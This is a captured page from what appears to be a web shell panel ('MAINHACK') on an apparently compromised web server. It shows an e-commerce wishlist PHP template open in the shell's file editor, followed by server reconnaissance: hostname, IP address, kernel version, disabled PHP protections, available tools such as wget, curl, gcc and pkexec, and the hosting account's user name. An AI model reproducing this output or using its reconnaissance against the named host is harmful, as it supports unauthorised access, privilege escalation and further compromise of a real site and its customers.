[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: wish_list.php
<!-- breadcrumbs --> <div class="container"> <div class="breadcrumbs"> <a href="index-1.html"><i class="las la-home"></i></a> <a href="#" class="active"><?php echo lang('Wishlist');?></a> </div> </div> <!-- account --> <div class="my_account_wrap section_padding_b"> <div class="container"> <div class="row"> <!-- account sidebar --> <?php $this->view('eCommerce/frontend/customer_profile_sidebar')?> <!-- account content --> <div class="col-lg-9"> <div class="shop_cart_wrap wishlist"> <?php if($wishlist){ foreach($wishlist as $item){ ?> <div class="single_shop_cart common_cart_trigger d-flex align-items-center flex-wrap mt-0 px-3 mb-3"> <div class="cart_img mb-4 mb-md-0"> <img loading="lazy" src="<?php echo base_url()?>uploads/items/<?php echo escape_output($item->photo); ?>" alt="product"> </div> <div class="cart_cont"> <a href="<?php echo base_url();?>e-product-details/<?php echo $this->custom->encrypt_decrypt($item->id, 'encrypt'); ?>"> <?php if($item->parent_name){?> <h5><?php echo escape_output($item->parent_name . '-'. $item->name);?></h5> <?php } else {?> <h5><?php echo escape_output($item->name);?></h5> <?php } ?> </a> </div> <div class="cart_price ms-md-auto ms-0"> <p><?php echo getAmt(floatval($item->sale_price)); ?></p> </div> <div class="wish_cart_btn ms-md-auto ms-0 mt-3 mt-md-0"> <button class="list_product_btn add-to-cart" data-type="<?php echo escape_output($item->type);?>" data-product-id="<?php echo $this->custom->encrypt_decrypt($item->id, 'encrypt');?>" data-sp="<?php echo $this->custom->encrypt_decrypt($item->sale_price, 'encrypt');?>"><span class="icon"> <i class="bi bi-cart3"></i> </span><?php echo lang('add_to_cart')?></button> </div> <div class="cart_remove ms-auto align-self-end align-self-md-center wishlist_remove" data-product-id="<?php echo $this->custom->encrypt_decrypt($item->id, 'encrypt');?>"> <i class="bi bi-trash"></i> </div> </div> <?php }} ?> </div> </div> </div> </div> </div>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.82 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002